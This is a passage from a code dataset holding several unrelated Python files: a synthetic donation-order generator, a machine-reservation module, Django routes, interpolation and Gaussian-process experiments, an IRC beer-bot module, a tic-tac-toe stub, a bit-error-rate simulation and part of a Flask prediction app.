1, 2, 3, 5]\r\n\r\n# Qty randomize between 20-30\r\n\r\n# Daily Simple Order Donations\r\n\r\n# Daily fridge Order Donations\r\n# 20 Random DailyItems \r\n# Qty 20-30\r\n\r\n# Weekly Shelf Order Donations\r\n# WeeklyItems\r\n# Divide by 7 to check\r\n# \r\n# each order to have 20 random items\r\n# # \r\n\r\nStartDate = \"1/10/2021\"\r\norderStartDate = datetime.strptime(StartDate, \"%m/%d/%Y\")\r\n \r\n# open orderItems file for writing\r\n\r\norderHdr = {'OrderId': [],\r\n 'PartnerId': [],\r\n 'OrderTotal': [],\r\n 'OrderDate': [],\r\n 'PartnerName': [],\r\n 'PartnerGeoLat': [],\r\n 'PartnerGeoLon': []\r\n }\r\n \r\norderItems = {'OrderId': [],\r\n 'OrderItemId': [],\r\n 'ProductType': [],\r\n 'ProductItem': [],\r\n 'ProductPeriod': [],\r\n 'ProductDetails': [],\r\n 'ProductStorage': [],\r\n 'Quantity': []\r\n }\r\n \r\nPartners = ['FoodieLand','LoMarket','Grocertown']\r\n \r\ng_lat=-27.467990\r\ng_lon=153.028090\r\n# Lat, Lon for 261 Quuen St, Brisbane\r\n\r\nPartnerGroup = 3\r\nPeriod = 90 #days \r\nStart_OrderID=20050\r\nStart_CustomerID=190050\r\nLow_Item_No=20\r\nHigh_Item_No=30\r\n# Jason Lowe Index Factor to create some peaks and lowes \r\nJLOF_INDEX = [5, 3, 1, 8, 9, 1, 2, 3, 5, 4, 3, 2, 6, 8, 9]\r\n\r\nfor i in range(0,PartnerGroup,1):\r\n \r\n partner_name = Partners[i]\r\n newLatBit=float(random.randrange(-750,750,1)/10000.0000)\r\n newLonBit=float(random.randrange(-750,750,1)/10000.0000)\r\n newLat = g_lat +newLatBit\r\n newLon = g_lon +newLonBit\r\n\r\n orderFreq=random.randrange(12,30,1)\r\n duration=math.floor(Period/orderFreq)\r\n \r\n # for each day\r\n for j in range(1,Period,1) :\r\n \r\n orderHdr['PartnerId'].append(Start_CustomerID+i) # autogen \r\n orderHdr['OrderId'].append(Start_OrderID+j) # autogen \r\n orderHdr['PartnerName'].append(partner_name) \r\n orderHdr['OrderTotal'].append(str(2000)) # autogen # autogen \r\n orderHdr['OrderDate'].append(orderStartDate + timedelta(days=j)) \r\n orderHdr['PartnerGeoLat'].append(newLat)\r\n orderHdr['PartnerGeoLon'].append(newLon)\r\n \r\n local_OrderItemId = 1\r\n \r\n #Simple Daily Food\r\n for k in range(0,FoodSimple_Catalog-1,1):\r\n \r\n Food_Index=k\r\n local_Quantity=random.randrange(Low_Item_No,High_Item_No,1)\r\n # print (math.floor(j/7))\r\n local_Quantity=local_Quantity * JLOF_INDEX[math.floor(j/7)]\r\n \r\n orderItems['OrderId'].append(Start_OrderID+j)\r\n orderItems['OrderItemId'].append(str(local_OrderItemId)) \r\n orderItems['ProductType'].append(df_foodsimple.loc[Food_Index][\"TYPE\"]) \r\n orderItems['ProductItem'].append(df_foodsimple.loc[Food_Index][\"ITEM\"]) \r\n orderItems['ProductPeriod'].append(df_foodsimple.loc[Food_Index][\"PERIOD\"]) \r\n orderItems['ProductDetails'].append(df_foodsimple.loc[Food_Index][\"DETAILS\"]) \r\n orderItems['ProductStorage'].append(df_foodsimple.loc[Food_Index][\"STORAGE\"]) \r\n orderItems['Quantity'].append(local_Quantity) \r\n local_OrderItemId=local_OrderItemId+1\r\n \r\n #Simple Daily Fridge Food\r\n orderItemNos=random.randrange(Low_Item_No,High_Item_No,1) \r\n for k in range(1,orderItemNos,1):\r\n \r\n Food_Index=random.randrange(1,FoodFridge_Catalog,1)\r\n local_Quantity=random.randrange(Low_Item_No,High_Item_No,1)\r\n local_Quantity=local_Quantity * JLOF_INDEX[math.floor(j/7)]\r\n \r\n orderItems['OrderId'].append(Start_OrderID+j)\r\n orderItems['OrderItemId'].append(str(local_OrderItemId)) \r\n orderItems['ProductType'].append(df_foodfridge.loc[Food_Index][\"TYPE\"]) \r\n orderItems['ProductItem'].append(df_foodfridge.loc[Food_Index][\"ITEM\"]) \r\n orderItems['ProductPeriod'].append(df_foodfridge.loc[Food_Index][\"PERIOD\"]) \r\n orderItems['ProductDetails'].append(df_foodfridge.loc[Food_Index][\"DETAILS\"]) \r\n orderItems['ProductStorage'].append(df_foodfridge.loc[Food_Index][\"STORAGE\"])\r\n orderItems['Quantity'].append(local_Quantity) \r\n local_OrderItemId=local_OrderItemId+1\r\n \r\n #Weekly Shelf Food\r\n orderItemNos=random.randrange(Low_Item_No,High_Item_No,1) \r\n if (Period % 7 == 0) :\r\n for k in range(1,orderItemNos,1):\r\n \r\n Food_Index=random.randrange(1,FoodShelf_Catalog,1)\r\n local_Quantity=random.randrange(Low_Item_No,High_Item_No,1)\r\n local_Quantity=local_Quantity * JLOF_INDEX[math.floor(j/7)]\r\n \r\n orderItems['OrderId'].append(Start_OrderID+j)\r\n orderItems['OrderItemId'].append(str(local_OrderItemId)) \r\n orderItems['ProductType'].append(df_foodshelf.loc[Food_Index][\"TYPE\"]) \r\n orderItems['ProductItem'].append(df_foodshelf.loc[Food_Index][\"ITEM\"]) \r\n orderItems['ProductPeriod'].append(df_foodshelf.loc[Food_Index][\"PERIOD\"]) \r\n orderItems['ProductDetails'].append(df_foodshelf.loc[Food_Index][\"DETAILS\"]) \r\n orderItems['ProductStorage'].append(df_foodshelf.loc[Food_Index][\"STORAGE\"])\r\n orderItems['Quantity'].append(local_Quantity) \r\n local_OrderItemId=local_OrderItemId+1\r\n \r\ndf_orderItems = pd.DataFrame(orderItems)\r\ndf_orderItems.to_csv (r'orderItemsDonations.csv', index = False, header=True)\r\nprint (df_orderItems)\r\n \r\ndf_orderHdr = pd.DataFrame(orderHdr)\r\ndf_orderHdr.to_csv (r'orderHeaderDonations.csv', index = False, header=True)\r\nprint (df_orderHdr)\r\n","sub_path":"src/partnerDonationsv1.py","file_name":"partnerDonationsv1.py","file_ext":"py","file_size_in_byte":6927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"41785667","text":"\"\"\"Functions connected with reservation feature.\"\"\"\n\nimport datetime\n\nimport db\nimport dbcommon\nfrom sqlalchemy import text\nfrom sqlalchemy.sql.expression import func, and_, or_, not_, false\n\n\ndef switch_to_dev_mode(machine, stream_id=None, build_id=None, config_id=None, scenario_id=None, system_id=None, submitted_by=None):\n submitted_by = unicode(submitted_by) if submitted_by else u\"MachineReserver\"\n stream_entity = stream_id if stream_id else u\"fake\"\n build_entity = build_id if build_id else u\"fake-1\"\n scenario_entity = scenario_id if scenario_id else u\"switch-to-DEV-OS\"\n config_entity = config_id if config_id else u'default'\n system_entity = system_id if system_id else u\"fake\"\n\n if machine.task:\n task_id = machine.task.id\n dbcommon.cancel_task(machine.task.id)\n dbcommon.rerun_task(task_id, u\"MachineReserver\")\n # process cancel immediately\n dbcommon.generic_reboot(machine)\n # add service task for switching os'\n build = dbcommon.get_entity(db.Build, build_entity, False) # fake build\n config = dbcommon.get_entity(db.Config, config_entity, False)\n system = dbcommon.get_entity(db.System, system_entity)\n scenario = dbcommon.get_entity(db.Scenario, scenario_entity)\n stream = dbcommon.get_entity(db.Stream, stream_entity)\n bundle = dbcommon.get_or_create_bundle_from_products(stream.branch, build, [scenario.tool])\n task_id = dbcommon.add_task_no_check(None, stream.id, build.id, machine.machines_group_id, scenario.id, config.id, system.id,\n bundle.id, machine_id=machine.id, submitted_by=submitted_by) # pylint: disable=E1103\n db.session.commit()\n return task_id\n\n\ndef _get_reservations_query(machine_id, start=None, end=None, user=None, obsolete=False, dev=False, reservation_period=None):\n q = db.MachineReservation.query\n q = q.filter(db.MachineReservation.machine_id == machine_id)\n if obsolete is not None:\n q = q.filter(db.MachineReservation.obsolete == obsolete)\n if user:\n q = q.filter(db.MachineReservation.user == user)\n if dev is not None:\n q = q.filter(db.MachineReservation.dev == dev)\n\n start = start if start else datetime.datetime.min\n end = end if end else datetime.datetime.max\n\n # convert to seconds from epoch\n from_db_period = db.MachineReservation.reservation_period\n epoch = \"1970-01-01\"\n from_db_start = func.timestampdiff(text(\"SECOND\"), epoch, db.MachineReservation.start)\n from_db_end = func.timestampdiff(text(\"SECOND\"), epoch, db.MachineReservation.end)\n new_start = func.timestampdiff(text(\"SECOND\"), epoch, start)\n new_end = func.timestampdiff(text(\"SECOND\"), epoch, end)\n new_period = reservation_period\n\n def is_intersecting_with_periodic_interval(res1_start, res1_end, res2_start, res2_end, res2_period):\n res2_interval = res2_end - res2_start\n return and_(res1_end > res2_start,\n not_(and_(\n res2_period - res2_interval >= res1_end - res1_start,\n not_(or_(\n (((res1_start - res2_start) % res2_period) + res2_period) % res2_period < res2_interval,\n (((res1_end - res2_start) % res2_period) + res2_period - 1) % res2_period < res2_interval\n ))\n )))\n\n # already reserved cyclical reservations intersecting with new single/cyclical reservation\n cyclical_both = and_(\n from_db_period.isnot(None),\n is_intersecting_with_periodic_interval(new_start, new_end, from_db_start, from_db_end, from_db_period)\n )\n\n # already reserved single reservations intersecting with new single reservation\n single_single = and_(\n not_(from_db_period.isnot(None)),\n or_(\n and_(new_start >= from_db_start, new_start < from_db_end),\n and_(new_end > from_db_start, new_end <= from_db_end),\n and_(new_start <= from_db_start, new_end >= from_db_end)\n ))\n\n # already reserved single reservations intersecting with new cyclic one\n single_cyclical = false() if new_period is None else\\\n and_(\n not_(from_db_period.isnot(None)),\n is_intersecting_with_periodic_interval(from_db_start, from_db_end, new_start, new_end, new_period)\n )\n\n return q.filter(or_(cyclical_both, single_single, single_cyclical))\n\n\ndef get_reservations(machine_id, start=None, end=None, user=None, obsolete=False, dev=False, reservation_period=None):\n # get reservations that are intersecting the specified interval for the specified machine and user\n # the searching interval can be periodic, given by reservation_period in seconds\n return _get_reservations_query(machine_id, start, end, user, obsolete, dev, reservation_period).all()\n\n\ndef get_machine_reservation_entry(machine, datetime_check=None, user=None):\n if datetime_check is None:\n datetime_check = datetime.datetime.now()\n q = db.MachineReservation.query\n q = q.filter(db.MachineReservation.machine_id == machine)\n q = q.filter(db.MachineReservation.obsolete == False)\n q = q.filter(db.MachineReservation.start < datetime_check)\n q = q.filter(db.MachineReservation.end > datetime_check)\n if user:\n q = q.filter(db.MachineReservation.user == user)\n reservation_entry = q.first()\n return reservation_entry\n\n\ndef reserve_machine(machine_id, user, interval=None, system_id=None, dev=False):\n machine = dbcommon.get_entity(db.Machine, machine_id)\n if dev:\n machine.dev_owner = user\n if machine.task and machine.shareable and not machine.dual_use_hw:\n dump_scenario = dbcommon.get_entity(db.Scenario, 'dump-os', False)\n # if previous dump task was unsuccessful do nothing\n # get last task, check if its ok\n q = db.session.query(db.Task)\n q = q.filter(db.Task.machine_used_id == machine.id)\n q = q.order_by(db.Task.submitted.desc())\n last_task = q.first()\n if last_task and not ((last_task.scenario_id == dump_scenario.id and last_task.completion_state == 'TASK_CMPLT_ALL_OK') or\n last_task.scenario_id != dump_scenario.id):\n return False\n\n machine.disabled_by = user\n machine.disabled_date = datetime.datetime.now()\n machine.interval = interval\n if machine.shareable:\n db.session.commit()\n switch_to_dev_mode(machine, system_id=system_id)\n return True\n\n\ndef is_multiple_day_reservation(reservation):\n start = reservation.get('start')\n end = reservation.get('end')\n\n start_day_end = datetime.datetime.strptime(start, \"%Y-%m-%d %H:%M:%S\").strftime(\"%Y-%m-%d 23:59:59\")\n start_day_end = datetime.datetime.strptime(start_day_end, \"%Y-%m-%d %H:%M:%S\")\n end = datetime.datetime.strptime(end, \"%Y-%m-%d %H:%M:%S\")\n if end > start_day_end:\n return True\n return False\n\n\ndef split_multiple_day_reservation(reservation):\n # split the reservation at the end of first day's reservation\n if not is_multiple_day_reservation(reservation):\n return reservation, {}\n start = reservation.get('start')\n end = reservation.get('end')\n reservation_id = reservation.get('id')\n system_id = reservation.get('system')\n dev = reservation.get('dev')\n machine_id = reservation.get('machine')\n user = reservation.get('user')\n reservation_period = reservation.get('reservation_period')\n\n dict_tail = {'id': reservation_id, 'system': system_id, 'dev': dev, 'machine': machine_id, 'user': user,\n 'reservation_period': reservation_period}\n\n start_day_end = datetime.datetime.strptime(start, \"%Y-%m-%d %H:%M:%S\").strftime(\"%Y-%m-%d 23:59:59\")\n next_day_start = datetime.datetime.strptime(start, \"%Y-%m-%d %H:%M:%S\")\n next_day_start += datetime.timedelta(days=1)\n next_day_start = next_day_start.strftime(\"%Y-%m-%d 00:00:00\")\n\n return dict({'start': start, 'end': start_day_end}, **dict_tail), dict({'start': next_day_start, 'end': end}, **dict_tail)\n\n\ndef divide_multiple_day_reservation(reservation):\n partial_reservations = []\n r = None\n temp_reservation = dict(reservation)\n while is_multiple_day_reservation(temp_reservation):\n r = split_multiple_day_reservation(temp_reservation)\n partial_reservations.append(r[0])\n temp_reservation = r[1]\n if r:\n partial_reservations.append(r[1])\n return partial_reservations\n","sub_path":"berta/berta/reservation.py","file_name":"reservation.py","file_ext":"py","file_size_in_byte":8441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"82007973","text":"from django.urls import path\r\nfrom . import views\r\n\r\nurlpatterns = [\r\n path('', views.index,name=\"shopApp\"),\r\n path('aboutus/',views.aboutus,name=\"aboutus\"),\r\n path('contactus/',views.contactus,name=\"contactus\"),\r\n path('tracker/',views.tracker,name=\"tracker\"),\r\n path('search/',views.search,name=\"search\"),\r\n path('checkout/',views.checkout,name=\"checkout\"),\r\n path('products/',views.productview,name=\"productview\"),\r\n]\r\n","sub_path":"shop/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"271505714","text":"import numpy as np\n#import sys\n#import os\n#import math\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm\nfrom matplotlib.ticker import LinearLocator, FormatStrFormatter\nfrom mpl_toolkits.mplot3d import Axes3D\n#import numpy.matlib\nfrom scipy.optimize import fsolve\n#from scipy.optimize import brentq\n#from scipy.interpolate import griddata\n#from scipy.interpolate import CubicSpline\nfrom scipy.optimize import root\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom scipy import interpolate\n#from scipy.interpolate import interpn\nfrom sklearn.gaussian_process import GaussianProcessRegressor\nfrom sklearn.gaussian_process.kernels import RBF, WhiteKernel, RationalQuadratic, ExpSineSquared, ConstantKernel as C\nimport warnings\n#from numpy import linalg as LA\n\n\ndef f(x):\n \"\"\"The function to predict.\"\"\"\n return x * np.sin(x)\n\nn = 40\nstatus_collect = np.ones(n*n)\nstatus_collect[20] = 0\nstatus_collect[300] = 0\nstatus_collect[400] = 0\n\na_grid = np.linspace(-1,1,n)\nx_grid = np.linspace(-1,1,n)\n\nAA, WW = np.meshgrid(a_grid, x_grid)\nA_A = AA.reshape((n*n, 1))\nW_W = WW.reshape((n*n, 1))\n#aw = np.column_stack((A_A, W_W))\n\na_star_old = (1/np.pi)*np.exp( np.abs(AA -WW)**(2))\n\nprint('a_star_old.shape',a_star_old.shape)\n\n#status_collect.reshape((n,n))\n\ncontrols_unemp = np.where(status_collect < 1.0)\n\nstatus_collect[430] = 3\n\ncontrols_emp = np.where(status_collect > 1.0)\n\njoint = controls_unemp + controls_emp\n\n\n\n\nfor i,j in enumerate(joint[0]):\n #aw[j,:] = np.PINF\n (x_nan, a_nan) = divmod(j, n)\n #print(a_nan,x_nan)\n AA[a_nan,x_nan] = np.PINF\n\n\nprint(AA.shape)\narray = np.ma.masked_invalid(AA)\nnewAA = AA[~array.mask]\nnewWW = WW[~array.mask]\nnewarr = a_star_old[~array.mask]\n\nprint('newAA.shape' , newAA.shape)\nprint('newWW.shape' , newWW.shape)\nprint('newarr.shape', newarr.shape)\na_func = lambda q,h: interpolate.griddata((newAA,newWW), newarr.ravel(),(q,h),method='cubic')\n\n''' \nfig = plt.figure()\nax = fig.gca(projection='3d')\nsurf = ax.plot_surface(AA, WW, a_func(AA,WW), cmap=cm.coolwarm,\n linewidth=0, antialiased=False)\nfig.colorbar(surf, shrink=0.5, aspect=5)\nplt.show()\n\nprint(a_func(a_grid[20],x_grid[7]), (1/np.pi)*np.exp( np.abs(a_grid[20] - x_grid[7])**(2)) )\nprint(a_func(a_grid[20],x_grid[0]), (1/np.pi)*np.exp( np.abs(a_grid[20] - x_grid[0])**(2)) )\n'''\n\nn = 10j\n(x1,x2,x3,x4) = np.mgrid[0:5:n,0:5:n,0:5:n,0:5:2j]\n\n\nyy = x1*x2*x3*x4\n\n\n#print(x1.shape)\nx1 = x1.reshape((10*10*10*2,1))\nx2 = x2.reshape((10*10*10*2,1))\nx3 = x3.reshape((10*10*10*2,1))\nx4 = x4.reshape((10*10*10*2,1))\nyy = yy.reshape((10*10*10*2,1))\n\n\n#a_emp_func = lambda q, h, s: interpolate.interpn((x1,x2,x3),yy, (q, h, s), bounds_error=False, fill_value=None)\n #bounds_error=False, fill_value=None) #\n\n\n#print(x1.shape,yy.shape)\na_emp_func = interpolate.Rbf(x1,x2,x3,x4,yy)\n#print(a_emp_func(2,2,2,2))\n#print(a_emp_func(2,2,2))\n# Mesh the input space for evaluations of the real function, the prediction and\n# its MSE\nx = np.atleast_2d(np.linspace(0, 10, 10)).T\n\n\ndicts = {}\nE_func = {}\nkeys = range(4)\nvalues = [\"Hi\", \"I\", \"am\", \"John\"]\nfor i in keys:\n dicts[i] = values[i]\n E_func[i] = 'E_func_'+str(i)\nprint(dicts[1])\nprint(E_func)\nkernel = C(1.0, (1e-3, 1e-3)) * RBF(7, (1e-3, 1e2))\n\nE_func[1] = GaussianProcessRegressor(kernel=kernel, n_restarts_optimizer=10)\nkernel_bis = C(1.0, (1e-3, 1e-3)) * RBF(3, (1e-3, 1e2))\n\nE_func[2] = GaussianProcessRegressor(kernel=kernel_bis, n_restarts_optimizer=10)\n\n\nprint(E_func[1])\n\n# now the noisy case\nX = np.linspace(0.1, 9.9, 20)\nX = np.atleast_2d(X).T\n\n# Observations and noise\ny = f(X).ravel()\ndy = 0.5 + 1.0 * np.random.random(y.shape)\nnoise = np.random.normal(0, dy)\ny += noise\n\n# Instanciate a Gaussian Process model\n#gp = GaussianProcessRegressor(kernel=kernel, alpha=(dy / y) ** 2,\n# n_restarts_optimizer=10)\n\nE_func[1].fit(X, y)\n\n\ny_pred, sigma = E_func[1].predict(x, return_std=True)\nprint(y_pred)\nprint(sigma)\n\nE_func[2].fit(X, y)\n\ny_pred, sigma = E_func[2].predict(x, return_std=True)\nprint(y_pred)\nprint(sigma)\n\n\n''' \n#a_star_old = a_star_old.reshape((n,n))\n\narray = np.ma.masked_invalid(AA[:,0])\nnewAA = AA[~array.mask]\nnewWW = WW[~array.mask]\nnewarr = a_star_old[~array.mask]\n\n\n\n\nprint(a_func(newAA,newWW))\n#griddata\n\nfig = plt.figure()\nax = fig.gca(projection='3d')\n\nsurf = ax.plot_surface(AA, WW, a_func(AA,WW), cmap=cm.coolwarm,\n linewidth=0, antialiased=False)\nfig.colorbar(surf, shrink=0.5, aspect=5)\n\nplt.show()\n\n\narray = np.ma.masked_invalid(a_star_old)\nnewaw = aw[~array.mask]\nnewarr = a_star_old[~array.mask]\n\nprint(array)\n\n\na_u_try = np.empty_like(grid)\n\nfor i,j in enumerate(grid):\n a_u_try[i] = a_func(i)\n\nfig, ax = plt.subplots(figsize=(9, 5))\nax.plot(grid, a_u_try, label='vabbe')\nplt.legend(loc='upper left')\n\n\nplt.show()\n'''","sub_path":"testingstuff.py","file_name":"testingstuff.py","file_ext":"py","file_size_in_byte":4844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"621032867","text":"#! /usr/bin/env python\n# coding=utf8\n\nfrom BotModule import BotModule\nfrom BotCommand import BotCommand\n\nfrom time import *\n\nimport os, sys, random\n\nclass BeerModule(BotModule):\n\tdef __init__(self):\n\t\treturn\n\n\tdef command(self, command):\n\t\tlt = localtime()\t\n\t\tif command.command == \"!beer\" or command.command == \"!bier\":\n\t\t\tif 6 < lt[3] < 16:\n\t\t\t\tline = \"Kein Bier vor 4!\"\n\t\t\t\tcommand.answer(line)\n\t\t\telse:\n\t\t\t\tschmack = random.choice([\"leckeres\", \"wohltuendes\", \"wohlschmeckendes\", \"eisgekühltes\", \"lauwarmes\", \"abgestandenes\", \"schales\"])\n\t\t\t\tbeer = random.choice([\"Tannenzäpfle\", \"Höpfner\", \"Leikeim\", \"Becks\", \"Jever\", \"Öttinger\", \"Palmbräu\", \"Andechser Doppelbock\", \"Kölsch\", \"Veltins\"])\n\t\t\t\t\n\t\t\t\tcompliment = \"\"\n\t\t\t\treciever = nick\n\t\t\t\tif len(args) > 0:\n\t\t\t\t\treciever = args[0]\n\t\t\t\t\tcompliment = \" Mit freundlichen Grüßen von \" + nick\n\t\t\t\tline = \"gibt \" + reciever + \" ein \" + schmack + \" \" + beer + \".\" + compliment\n\n\t\t\t\tcommand.answer(line)\n\n\tdef help(self, nick):\n\t\tself.sendPrivateMessage(nick, \"!bier/!beer - Verteilt Bier.\")\n\t\treturn\n","sub_path":"modules/BeerModule.py","file_name":"BeerModule.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"276667697","text":"# -*- coding: utf-8 -*-\n#COMECE AQUI ABAIXO\nimport random\nprint('Bem vindo ao JogoDaVelha do Grupo 1 [Caio,Hugo,Anderson,Juan]') \na = input('Digite seu nome:')\nb = input('Digite qual simbolo você quer usar, X ou O : ')\nwhile b!= 'X' and b!= 'O':\n b = input('Digite qual simbolo você quer usar, X ou O : ')\n\ncomeço =random.randint(0,1)\nprint (começo)\n","sub_path":"moodledata/vpl_data/380/usersdata/310/87927/submittedfiles/testes.py","file_name":"testes.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"359876794","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun May 21 01:54:31 2017\r\n\r\n@author: LeviMe\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport random as rd\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\n\r\nNbSymboles=1000\r\nTs=1 #1 symbole/s\r\nTe=10\r\n\r\ndef phi(x):\r\n return (1/np.sqrt(2*np.pi)* np.exp(-x**2 /2))\r\n\r\ndef Phi(x):\r\n if (x==0):\r\n return 0.5\r\n if (x<0):\r\n return 1 - Phi(np.abs(x))\r\n if (x>0):\r\n s2=0\r\n t=np.linspace(0,x,2000)\r\n step=t[1]\r\n for k in t:\r\n s2+=phi(k)\r\n s2*=step\r\n return 0.5+s2\r\n \r\ndef to_list(A):\r\n Ap=[]\r\n for k in A:\r\n Ap+=[k]\r\n return Ap\r\n\r\nTEB=[]\r\nTEBtheo=[]\r\n\r\nrange_Eb_sur_N0_dB=np.linspace(0,6,6*10+1)\r\nfor Eb_sur_N0_dB in range_Eb_sur_N0_dB:\r\n\r\n ##############generation de symboles############################\r\n\r\n bits =[rd.randrange(0,2) for k in range(NbSymboles)]\r\n\r\n ##############Mapping des symboles##############################\r\n\r\n symboles=[2*bit-1 for bit in bits]\r\n \r\n ##############Multiplication par un peigne de dirac#############\r\n\r\n dirac=[1]+ [0]*(Te-1)\r\n suite_diracs_ponderes=to_list(np.kron(symboles,dirac))\r\n\r\n ###########Convolution par un filtre de mise en forme############\r\n\r\n def convolve(U,V):\r\n N1=len(U)\r\n N2=len(V)\r\n\r\n W=[]\r\n for n in range(N1+N2-1):\r\n s=0\r\n for k in range(max(0,n-N2+1),min(n+1,N1)):\r\n s+=U[k]*V[n-k]\r\n W+=[s]\r\n return W\r\n\r\n shaping_filter=[1]*Te\r\n shaped_signal=convolve(shaping_filter,suite_diracs_ponderes)\r\n\r\n #########Ajout d'un bruit blanc Gaussien ###################################\r\n Eb_sur_N0=10*(Eb_sur_N0_dB/10)\r\n sigma_n_carre=(sum(shaping_filter[k]**2 for k in range(Te)) * np.var(symboles)**2)\r\n sigma_n_carre/=(2*np.log2(2) * Eb_sur_N0)\r\n sigma_n=np.sqrt(sigma_n_carre)\r\n signal_bruite=[k + rd.normalvariate(0,sigma_n) for k in shaped_signal]\r\n\r\n #########Convolution par un filtre de reception####################\r\n\r\n reception_filter=[1]*(int)(Te/2)\r\n signal_recu=convolve(reception_filter,signal_bruite)\r\n signal_recu=[4*k/Te for k in signal_recu]\r\n\r\n signal_detecte=[(signal_recu[-5+k*Te]) for k in range(1,NbSymboles*Ts+1)]\r\n #print(signal_detecte)\r\n\r\n ################Decision############################################\r\n\r\n def decision(A):\r\n M=[]\r\n for k in A:\r\n if ((abs(k+1) ) < (abs(k-1))):\r\n M+=[0]\r\n else:\r\n M+=[1]\r\n return M\r\n\r\n bits_decides=decision(signal_detecte)\r\n\r\n #############Statistiques############################################\r\n\r\n Teb=sum((bits[k]!=bits_decides[k]) for k in range(NbSymboles)) / NbSymboles\r\n #print(\"Eb_sur_N0=\"+str(Eb_sur_N0)+\" Teb=\"+str(Teb*100)+\" %\")\r\n \r\n TEB+=[Teb]\r\n TEBtheoCourant=1-Phi(np.sqrt(2*Eb_sur_N0))\r\n TEBtheo+=[TEBtheoCourant]\r\n print(str(Eb_sur_N0)+\" \"+str(Teb)+ \" \"+ str(TEBtheoCourant))\r\n \r\n \r\nplt.close()\r\nplt.plot(range_Eb_sur_N0_dB,TEB)\r\nplt.plot(range_Eb_sur_N0_dB,TEBtheo)\r\n\r\nplt.legend(\"TEB=f(Eb)\")\r\nplt.show()\r\n","sub_path":"code projet première année/code/Teb=f(sigma).py","file_name":"Teb=f(sigma).py","file_ext":"py","file_size_in_byte":3120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"458711379","text":"from flask import Flask, render_template, request\nimport numpy as np\nimport pandas as pd\nimport json\nimport plotly\nimport plotly.graph_objs as go\nimport pickle\n\ndef create_plot():\n\n df = pd.read_csv('bank_clean.csv') # creating a sample dataframe\n\n data = [\n\n go.Pie(\n labels = ['{}'.format(i) for i in list(df['y'].unique())],\n values = [36548, 4640],\n textinfo='label+percent',\n textposition='inside',\n hole = .3,\n )\n ]\n\n graphJSON = json.dumps(data, cls=plotly.utils.PlotlyJSONEncoder)\n\n return graphJSON\n\n\napp = Flask(__name__)\n\n@app.route('/')\ndef home():\n return render_template('home.html')\n\n@app.route(\"/predict\")\ndef pred():\n return render_template(\"predict.html\")\n\n@app.route(\"/visual\")\ndef visual():\n bar = create_plot()\n return render_template('visual.html', plot=bar)\n\n\n@app.route(\"/DataFrame\")\ndef data():\n data = pd.read_csv('bank_clean.csv')\n df = data.head(50).to_html(classes = 'data')\n return render_template('data.html', tables=[df])\n\n@app.route(\"/result\", methods = [\"POST\",\"GET\"])\ndef result():\n if request.method == \"POST\":\n input = request.form\n\n cpi = float(input['cpi'])\n\n cci = float(input['cci'])\n\n euribor = float(input['euribor'])\n\n employee = float(input['employee'])\n\n var = float(input['var'])\n \n age = int(input['age'])\n \n job = input['job']\n if job == 'admin.':\n strJob = 'Admin'\n dataJob = 'admin.'\n elif job == 'blue-collar':\n strJob = 'Blue-Collar'\n dataJob = 'blue-collar'\n elif job == 'entrepreneur':\n strJob = 'Entrepreneur'\n dataJob = 'entrepreneur'\n elif job == 'housemaid':\n strJob = 'Housemaid'\n dataJob = 'housemaid'\n elif job == 'management':\n strJob = 'Management'\n dataJob = 'housemaid'\n elif job == 'retired':\n strJob = 'Retired'\n dataJob = 'retired'\n elif job == 'self-employed':\n strJob = 'Self-employed'\n dataJob = 'self-employed'\n elif job == 'services':\n strJob = 'Services'\n dataJob = 'services'\n elif job == 'student':\n strJob = 'Student'\n dataJob = 'services'\n elif job == 'technician':\n strJob = 'Technician'\n dataJob = 'technician'\n else:\n strJob = 'Unemployed'\n dataJob = 'unemployed'\n\n marital = input['marital']\n if marital == 'married':\n strMarital = 'Married'\n dataMarital = 'married'\n elif marital == 'single':\n strMarital = 'Single'\n dataMarital = 'single'\n else:\n strMarital = 'Divorced'\n dataMarital = 'divorced'\n\n default = input['default']\n if default == 'yes':\n strDefault = 'Yes'\n dataDefault = 'yes'\n elif default == 'no':\n strDefault = 'No'\n dataDefault = 'yes'\n else:\n strDefault = 'Unknown'\n dataDefault = 'unknown'\n\n month = input['month']\n if month == 'jan':\n strMonth = 'January'\n dataMonth = 'january'\n elif month == 'feb':\n strMonth = 'February'\n dataMonth = 'february'\n elif month == 'mar':\n strMonth = 'March'\n dataMonth = 'march'\n elif month == 'apr':\n strMonth = 'April'\n dataMonth = 'april'\n elif month == 'may':\n strMonth = 'May'\n dataMonth = 'may'\n elif month == 'june':\n strMonth = 'June'\n dataMonth = 'june'\n elif month == 'july':\n strMonth = 'July'\n dataMonth = 'july'\n elif month == 'aug':\n strMonth = 'August'\n dataMonth = 'august'\n elif month == 'sep':\n strMonth = 'September'\n dataMonth = 'september'\n elif month == 'oct':\n strMonth = 'October'\n dataMonth = 'october'\n elif month == 'nov':\n strMonth = 'November'\n dataMonth = 'november'\n else:\n strMonth = 'December'\n dataMonth = 'december'\n\n campaign = int(input['campaign'])\n\n pdays = input['pdays']\n if pdays == 'Contacted':\n strPdays = 'Contacted'\n dataPdays = 'Contacted'\n else:\n strPdays = 'Never contacted before'\n dataPdays = 'Never contacted before'\n\n poutcome = input['poutcome']\n if poutcome == 'success':\n strPoutcome = 'Success'\n dataPoutcome = 'success'\n elif poutcome == 'failure':\n strPoutcome = 'Failure'\n dataPoutcome = 'failure'\n else:\n strPoutcome = 'Nonexistent'\n dataPoutcome = 'nonexistent'\n\n\n education = input['education']\n if education == 'basic.4y':\n strEducation = 'Basic.4y'\n dataEducation = 